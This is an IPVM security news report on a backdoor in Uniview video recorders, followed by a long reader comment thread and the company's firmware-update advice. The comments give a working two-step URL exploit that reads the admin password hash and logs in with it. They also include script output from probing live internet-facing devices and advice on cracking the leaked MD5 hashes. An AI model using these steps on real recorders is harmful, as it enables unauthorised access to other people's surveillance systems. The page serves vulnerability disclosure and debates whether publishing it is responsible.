Uniview Recorder Backdoor Examined

By: Brian Karas, Published on Oct 20, 2017

A Chinese research group has identified a vulnerability in Uniview recorders that allows backdoor access in a method similar to the Dahua backdoor.

IPVM spoke with the researcher behind the discovery and Uniview to determine the severity and impact of this discovery.

In this report we share Uniview's response and our analysis.

Samsung ************* ****** / ******** ******* ***

*** *** ****** *****, ***-****-*****, ********* **** ************* for *******, *** *******. IPVM *** ******** **** the ************* ** ** Uniview ********* *** **** Samsung / ****** *** OEMing * ******* ****** of ******* ********* ****** China. *** *********** *** tested * ******* ***** model *** **** *** aware ** *** **** of *** ****** ** the ************ ******* ******* and *******.

* ********** ** * Uniview ***-**** [**** ** longer *********] (***) *** the *******-******* **** **** for *** ******** (******) show *** ******** ************ between *** *****:

Vulnerability ********

*** ************* ******** * process ** ********** * URL **** *** ******** ***** contains * **** ** the ***** ********. **** hash *** **** ** **** to ********** *** *** login, ******* *** ***-********* hash **** ** *** unit ******* ** ******* on * ****-******** ********. Doing ** ****** * user ** ***** ** the ***** *** ********* with ***** **********, *** perform *** ******** ********* to *** ***** ****.

Researcher ********

*** ******* ****** *** discovery, "******* ******** *******" contacted **** ***** ********* filing *** ***, ******* they **** * ******** research ************ ***** ** Beijing. **** ** *** have * *******, *** were ********** ** *****, providing ********** *******, **** as ***** # *** firmware ** *** **** tested, *** *****.

** **** *** **** evidence *** ********** ********* ******* / ****** ****** **********. Typically *********** ******* ************* of ********* ************* ** ******** vendors ** **** ** the ********** *******.

Models ********

****** **** **** *** ************* ******* to ***** ********* *** not ** *******. *** company *** *** ******* specific ****** ** ******** versions ********, *** **** they **** ******* **** information **** ******* ******** is *********, ********* ******** for ******* **** ****.

**** ******* ** ******** available ***** (*** ******) showed *** ************* ******** all ******* ********* ******.

****** (*** *** ****** Samsung) ****** *** ********* China-only ****** *** ********:

  • ***-****
  • ***-****
  • ***-*****

Ease ** ******* - *******

********** **** ************* **** requires ********** *** ***** password **** **** *** URL, *** **** ******* that **** **** ******* URL ** ***** ** the **** ** *****. This *** ** **** in *** *****:

  1. *** *** ***** ******** hash ***** **** ***: http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}  (**** *** "*************", *** string ** ********** ***** is *** ***** ******** hash)
  2. *** ** ** ***** to * ******* ******** using **** ***: ****://**.***.**.**:****/***-***/****-***?****=*&**********=*****&************=***********************

 

*******, **** ************* ** very **** ** ******* and **** *** ******* any ******** *********** ** scripting *********.

Minimal ******-****** *******

******* **** *** ******* recorder *********** ***** **** *** ******* online, **** *** ******** of **** ***** ** the **:

Uniview ****, *** ********

[*******]

******* *** ***** ********* updated ******** *** **** vulnerability. ********* ** *** company, *** ******* *** to *****/******* ** ** use *** ********'* *****-** cloud ******* *****. **** Setup->Maintenance ***** ****** ** a "*****" ****** ** check *** *** ********:

******** *** "*****" ****** will ***** *** ******** to ***** *** ******* firmware *** ******* *** option ** *******:

******* ******** *** ********* **** for ********** **** *************:

*.******* **** ******* * new ******** ****** ** solve *** ***** ** the ******* ****. *** ****** ******* will ** ********.

*.******* **** ******* *** fixed ******** *** ******* products ** ***. ****.

*.******* **** ******* * new ******** ** *** of ******** ***** **** use * ******* *** CGI ****** *** ***** security ************** *** **** other ******** ****.

*** *** ****** **** and ******* ** ******** that *** ******** ** this *************, ** **** release ** ******** ********* simultaneously **** ** ******* the *** ********.

** ** *** ******* Uniview *** ******** ** this ************* ****** ** contacted ****, *** **** were ********** ** ** once **** ***** ** the *****.

OEM *****

**** ************* ***** ******* example ** *** ***** ********** with relying ** *** *************. Samsung ****** ****** ** Uniview ** * *** to **** ***** ** the ******* ***** ***** units **** ****, *** they **** ****** ** their ***** *** ** the *************. *******, ***** associated **** ********** **** may **** *** *** savings. ******* **** ***** backlash **** ******** ********* realize **** *** *** get ** '*********' ******* product, *** **** ******* is ****** ******* ** Uniview ** ******* **** issue.

***** ** *******'* ******* schedule *** ******** *******, it ** ***** **** Uniview's ******* ******* ** fixing ***** *** ***** before ********** **** *** the *** ********. ******* prioritization *** **** **** previously **** ***** *** Hikvision **** **** *** similar *************** ** *******, showing **** *** ********* are ***** *** ******** when *** *** **** sells ******* ***** ***** own ***** ** *** same *******.

 

 

Comments (36)

IPVM testing of publicly available units (via Shodan) showed the vulnerability affected all Uniview recorders tested.

 

As a direct wholesaler of Uniview products, this is of great concern.  Once I read this article, I had my operations manager as well as the tech department run some tests to see if the branded Uniview recorders that we sell were vulnerable.  We have not been able to replicate this vulnerability.  Can I assume that the only models vulnerable are the OEMs for Samsung?

Rich -

What did you do for a test? When you say you could not replicate it, what happened?

Uniview themselves confirmed this affects more than just the Samsung OEMs, but as stated in the report, did not clarify specific models affected.

If you can share your test/validation process and model/firmware it might help others in determining which units are vulnerable or not. 

I just pulled a few pages of IPs from the Shodan search and ran a quick test to see which units would respond to the initial request that attempts to read the hashed password, eg:

http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}

 

Reading this file is the core part of the vulnerability (if you cannot get the hashed password form the unit, you cannot exploit it with this method).

All but one of the IPs I tried gave me a response I was able to extract a password hash from - sample below:

BRK-Air-46:PerlStuff brk$ ./UNVTest.pl
Testing...
Found password:
"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e"
Testing...
Found password:
"szLoginPasswd": "33d130f7ed0c7998b41e37d46a4d5d14"
Testing...
Could not get password hash.
Testing...
Found password:
"szLoginPasswd": "33d130f7ed0c7998b41e37d46a4d5d14"
Testing...
Found password:
"szLoginPasswd": "aca257be08c76a57e2a4a721d9af85e3"
Testing...
Found password:
"szLoginPasswd": "33d130f7ed0c7998b41e37d46a4d5d14"
Testing...
Found password:
"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e"
Testing...
Found password:
"szLoginPasswd": "770c13cf6390d7877c11fcdfb3659100"
Testing...
Found password:
"szLoginPasswd": "7ca595ec2cb9a52462baf8a50e5c9aa6"
Testing...
Found password:
"szLoginPasswd": "c4c19a1769c8630b5c53127c75d46221"
Testing...
Found password:
"szLoginPasswd": "7ca595ec2cb9a52462baf8a50e5c9aa6"
Testing...
Found password:
"szLoginPasswd": "c4c19a1769c8630b5c53127c75d46221" 

I would be curious what your model # and firmware build are if you cannot get the password hash back from the device.

My lead tech is going through each and every model right now to include the older 200 series models.  I will get back with you.

Found password:
"szLoginPasswd": "e10adc3949ba59abbe56e057f20f883e"

If you get a hash, google it, as there are websites containing reverse lookup tables for hashes of common passwords with different hashing algorithms. For instance, googling "e10adc3949ba59abbe56e057f20f883e" from Brian's list above, will give you "123456" (hashed using md5) which is probably the user password.

So it looks like they are just storing md5 hashes of the password. They should be using salted hashes at a minimum.

 

 

 

 

 

 

 

 

 

Yes, good point. I debated getting into using rainbow tables to try and just crack the hashes without even messing with POST manipulations but decided to keep it more brief. But if the user has a weak password this creates even more risk/ease of exploit. 

Agreed, it's more a sign of amateurism than part of the actual exploit. It's the reason I use different passwords for every product, website etc unless I really trust the company to store the passwords correctly. Otherwise one account gets hacked and they have your credentials for everything.

I've tried sending my techs findings since Friday and it will not post.  

You can email it to me: bkaras@ipvm.com

 

eager to see the findings

IPVM testing of publicly available units (via Shodan) showed the vulnerability affected all Uniview recorders tested.

What was the test?

Is there a list of other Uniview OEMs?

easterncctv, Revo and DH-Vision.

Here is a link to Uniview's website which shows who are their direct wholesalers in America.  We do not OEM at this time, we only sell branded Uniview products.  The question was who sells OEM Uniview:

http://en.uniview.com/About_Us/Partner/Partners/North_America/

 

The most interesting part in the whole request is that 'szUserName' is NULL, and the request do query for "admin".

http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}

I wonder how 'user' NULL can fall thru the authentication mechanism by 'mistake' and then be able to pull off sensitive data with admin privileges...

 

How hard is it to find these back doors? Or if you are a programmer, how hard is it to know this is a flaw? How preventable is this?

 

Here's the thing. My sub-division has a Facebook page. Once in a while we hear of people waking up and their cars being gone through. When I hear my neighbor Dale got robbed, I make sure I lock my car. When my neighbor Hilda gets robbed, I double down, check all the doors on my car, lock the house, and ensure my cameras are working.

 

I just can't imagine how a 3rd Chinese company could have these issues.

 

 

Or if you are a programmer, how hard is it to know this is a flaw? How preventable is this?

In my experience, it is partly programmers to blame, and partly management.

At some point a developer needs to study what is required to write secure code, e.g. reading a book such as this one. If they don't they are likely to invent their own solutions, make common mistakes etc. In our industry, any insecure code a developer writes is likely to go straight to the customer i.e. testing departments won't pick it up, that's for sure, it is a specialized type of testing skill that they don't have.

It can take a developer weeks to make a product resistant to hacking during which nothing they do translates into any visible features. So to some managers, it can look like they are not getting any work done during this time. If they want praise, they tend to work on features that sales people, managers, end users can actually see and touch. Likewise, managers are under pressure from sales people, CEOs etc and it is often security that gets lowest priority in favor of features that can be listed as bullet points on marketing brochures. 

So if you buy a software product where security is important, you hope it was written by a conscientious developer, or that the company knows about the problem and deals with it at a management level.

 

I totaly agree, and to make matters worse the engines / code writers and management all move around between companies on a regular basis.

So a mistake at one manufacture is replicated at another until It is discovered 

 

How hard is it to find these back doors?

Not so easy, you will need to spend some time reading and try to understand the code

Or if you are a programmer, how hard is it to know this is a flaw?

Dahua, Hikvision and now Uniview - these are no flaws, this is way too easy to exploit and way too portable to be 'flaws'

How preventable is this?

Question you should ask the manufacture who put it in there

I just can't imagine how a 3rd Chinese company could have these issues.

Unfortunately, I think you will need to get used to this for a while....

 

Just for fun I did some research too (as I'm curios), and I actually don't think anymore it's a backdoor, it's worse than that - they have absolutely no security whatsoever.

All OS calls are done purely with 'system()', and no sanitation whatsoever of user provided input, which gives full remote code execution (RCE) with some functions.

I thought Dahua was horrible, but Uniview passed down to absolutely bottom.

 

I thought Dahua was horrible, but Uniview passed down to absolutely bottom.

You must not be familiar with Xiongmai...

Actually been checking XM too, question I have there is who forked who.

Did Dahua fork XM, or did XM fork Dahua? (Personally I believe Dahua forked XM once)

Dahua didn't invent the 48bit hash, XM did.

Edit:

Proof for that you can find with this research: https://github.com/tothi/pwn-hisilicon-dvr

Actually been checking XM too, question I have there is who forked who.

Basically, Dahua "forked" everyone ;)

I thought Dahua was horrible, but Uniview passed down to absolutely bottom.

I suspect there's still a lot of others out there. About 1 year ago, I encountered a camera that completely ignored the username and password when connecting via RTSP. I told them about the problem, they denied it, I persisted and they eventually agreed to fix it. They didn't seemed overly concerned about the problem at all.

By the way, the findings has been reported back to both the Chinese security researchers and also hanwha security, who reached out to the Chinese security researches on their github. I'm sure they are already aware, but did that just in case they might not been.  

Now we see how badly the security is taken with the top 3 Chinese manufacturers.

So is anyone going to guess who's next to be published?

Would it be safe to say where most other development in China copy in some part from one the big 3, it's a fair bet there are 100 or more less secure devices sitting all over the place.

Maybe they should go ask Tencent a local company, who has it's own cyber security division, for a few RMB I bet they could tidy a lot of security issues.

Some people have commented they were having issues with the PostMan approach, which can be a bit awkward if you are not used to dealing with it. I spent a little time trying some other things, and realized you can do this all from the browser URL bar without anything fancy.

Two steps to test/exploit:

1) Get the admin password hash: http://ip.add.re.ss:PORT/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0}

2) Use it to login to a Uniview recorder: http://ip.add.re.ss:PORT/cgi-bin/main-cgi?lLan=0&szUserName=admin&szUserPasswd=PUT_THE_HASH_VALUE_HERE

Much easier/faster.  I just verified this worked on a few random Shodan results.

 

[IPVM Note: Poster is a Uniview Partner.]

Should this be posted as it is an EXPLICIT instruction on how to perform an illegal act by accessing other people's electronic devices without permission???

I was also curious on this as well. I also said "hmmm" in my mind in Brian said he tried it on some Shodan results.

[IPVM Note: Poster is a Uniview Partner.]

So, technically Brian has admittedly broken the law.

Not exactly, step #1 checking whether the URL exists could be done legally, and indicates whether the vulnerability is found.

step #2 is not necessary.

Some discussion of this here: Should I Hack 10,000 Dahua Cameras?

What we posted is effectively the same information as what is contained in the publicly available CVE.

The purpose of this report is to allow members who may use, sell, install, or service Uniview equipment to determine if their systems are vulnerable so that they can act appropriately to patch or secure them. 

We are certainly not recommending that people use this info for any kind of illicit purposes.

I respect your reporting of an important security flaw, but do you really think that it's beneficial and responsible to provide a cut-and-pasteable (sp?) example on how to exploit this?  While I'm sure most people here will use this in the manner in which it was intended, what happens when it falls into the wrong hands and people start logging in to units around the world illegally because you provided them the means to do so?  While this may be effectively the same information available to the public via CVE, you have taken it to a well-read, semi-public site and simplified it so that anyone can use it within 30 seconds.

I understand your concern, however I do not believe we have enabled the kinds of people who would want to use this vulnerability (or others we have similarly covered for other companies) with any knowledge they could not already easily figure out on their own. This is an extremely simple exploit, even in the first example shown. The core concept, passing back expected values in an HTTP POST, is almost as simple as it gets (the only one even less complex was Hikvision's Magic String Backdoor).

The flip side of this is that it has already been shown by some manufacturers that if we do not make it explicitly clear how easy some of these exploits are, how many systems are online, and the capabilities they expose to hackers that they will be spun as less risky than they really are. Or, people look at it and think "that won't happen to me, it takes too much effort to really pull off."

 

[UPDATE]

Uniview has begun releasing updated firmware for this vulnerability. According to the company, the easiest way to check/upgrade is to use the recorder's built-in cloud upgrade check. From Setup->Maintenance there should be a "Check" button to check for new firmware:

Clicking the "Check" button will cause the recorder to check for updated firmware and provide the option to upgrade:

an upgrade button that actually works?!?! Revolutionary!
Read this IPVM report for free.

This article is part of IPVM's 6,534 reports, 880 tests and is only available to members. To get a one-time preview of our work, enter your work email to access the full article.

Already a member? Login here | Join now

Related Reports

Dahua Critical Cloud Vulnerabilities on May 12, 2020
Dahua has acknowledged a series of cloud vulnerabilities that researcher...
Uniview Heat-Tracker Temperature Screening Series Examined on Apr 22, 2020
Uniview is marketing #UNVagainstCOVID19 with their Heat-Tracker series,...
Uniview Deep Learning Camera Tested on Jul 14, 2020
Uniview's intrusion analytics have performed poorly in our shootouts. Now,...
Face Masks Increase Face Recognition Errors Says NIST on Aug 04, 2020
COVID-19 has led to widespread facemask use, which as IPVM testing has shown...
Huawei HiSilicon Shortage Impacts Surveillance Manufacturers on Aug 14, 2020
Huawei acknowledged problems and challenges for its HiSilicon chip business,...
The Insecure Verkada Access Control System on Jun 25, 2020
While Verkada touts the security of its system and that how their new door...
US GSA Explains NDAA 889 Part B Blacklisting on Jul 31, 2020
With the 'Blacklist Clause' going into effect August 13 that bans the US...
Thermology Expert: "95-99%" Doing Fever Screening Wrong, Unjustified Compensating Algorithms "Insane" on Aug 27, 2020
A thermology expert tells IPVM "95 to 99% of people" are doing fever...
White House Expands Dahua Hikvision Blacklist To Federal Funding [Final Rule Reverses] on Aug 13, 2020
The White House is expanding the NDAA to blacklist anyone who "uses" banned...
Sunell is The First China Manufacturer to Market NDAA Compliance on Jul 30, 2020
Most China manufacturers are going to be impacted by the NDAA 'Blacklist...
Dahua USA Admits Thermal Solutions "Qualify As Medical Devices" on Jul 02, 2020
Dahua USA has issued a press release admitting a controversial point in the...
Clinton Public View Monitor (PVM) Mask Detection Tested on Jul 09, 2020
Face mask detection, or more specifically not wearing one, is expanding...
Avigilon Face Mask Detection Tested on Jun 24, 2020
Face mask detection or, more specifically not wearing a face mask, is an...
Warning: Panasonic i-PRO Deceives About NDAA Compliance on Aug 18, 2020
IPVM has determined that Panasonic i-PRO has deceived about its NDAA...
Honeywell Warns of Huawei, Advocates Futureproofing on Aug 31, 2020
For years, Honeywell has profited from OEMing Dahua and using Huawei...

Recent Reports

OnTech Smart Services Partners With Google and Amazon To Compete With Integrators on Sep 25, 2020
A pain point for many homeowners to use consumer security and surveillance is...
The Future of Metalens For Video Surveillance Cameras - MIT / UMass / Immervision on Sep 25, 2020
Panoramic cameras using 'fisheye' lens have become commonplace in video...
Hikvision Sues Over Brazilian Airport Loss on Sep 24, 2020
Hikvision was excluded from a Brazilian airport project because it is owned...
China General Chamber of Commerce Calls Out US Politics on Sep 24, 2020
While US-China relations are at an all-time low, optimism about relations...
Verkada Disruptive Embedded Live Help on Sep 24, 2020
Call up your integrator? Have someone come by the next day? Verkada is...
IP Networking Course Fall 2020 - Last Chance - Register Now on Sep 23, 2020
Today is the last chance to register for the only IP networking course...
Drain Wire For Access Control Reader Tutorial on Sep 23, 2020
An easy-to-miss cabling specification plays a key role in access control, yet...
Norway Council of Ethics Finds Hikvision Human Rights Abuses "Ongoing" on Sep 23, 2020
Hikvision's involvement in "serious human rights abuse" in Xinjiang is...
IPVM Camera Calculator User Manual / Guide on Sep 23, 2020
Learn how to use the IPVM Camera Calculator (updated for Version 3.1). The...
Installation Course Fall 2020 - Save $50 - Last Chance on Sep 22, 2020
This is a unique installation course in a market where little practical...
SimpliSafe Business Security Launched Examined on Sep 22, 2020
SimpliSafe has launched "SimpliSafe Business Security" that the company...
FLIR CEO: Many New Fever Entrants "Making Claims That The Science Just Won't Support" on Sep 22, 2020
FLIR's CEO joins a growing number calling out risks with fever / screening...
China Bems Temperature Measurement Terminal Tested on Sep 22, 2020
Guangzhou Bems (brand Benshi) is the manufacturer behind temperature...
Axis Exports To China Police Criticized By Amnesty International on Sep 21, 2020
Axis Communications and other EU surveillance providers are under fire from...
Milestone XProtect on AWS Tested on Sep 21, 2020
Milestone finally launched multiple cloud solutions in 2020, taking a...